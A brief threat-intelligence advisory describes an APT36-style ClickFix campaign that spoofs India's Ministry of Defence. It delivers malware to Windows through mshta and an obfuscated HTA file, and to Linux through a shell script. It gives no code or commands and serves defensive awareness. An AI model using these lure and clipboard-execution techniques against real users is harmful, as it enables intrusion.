APT36-Style ClickFix Attack Spoofs Indian Ministry to Target Windows & Linux

Description

A recent campaign attributed to APT36 has been observed spoofing India's Ministry of Defence to deliver cross-platform malware. The attackers used a ClickFix-style infection chain, mimicking government press releases and leveraging a compromised .in domain for payload staging. The campaign targeted both Windows and Linux users, employing clipboard-based execution techniques. On Windows, the attack utilized mshta.exe to execute a heavily obfuscated HTA file, while on Linux, it attempted to execute a shell script. The tradecraft observed, including government-themed lures, HTA-based delivery, and decoy documents, aligns with known APT36 tactics. This activity demonstrates the continued evolution of ClickFix techniques in new contexts.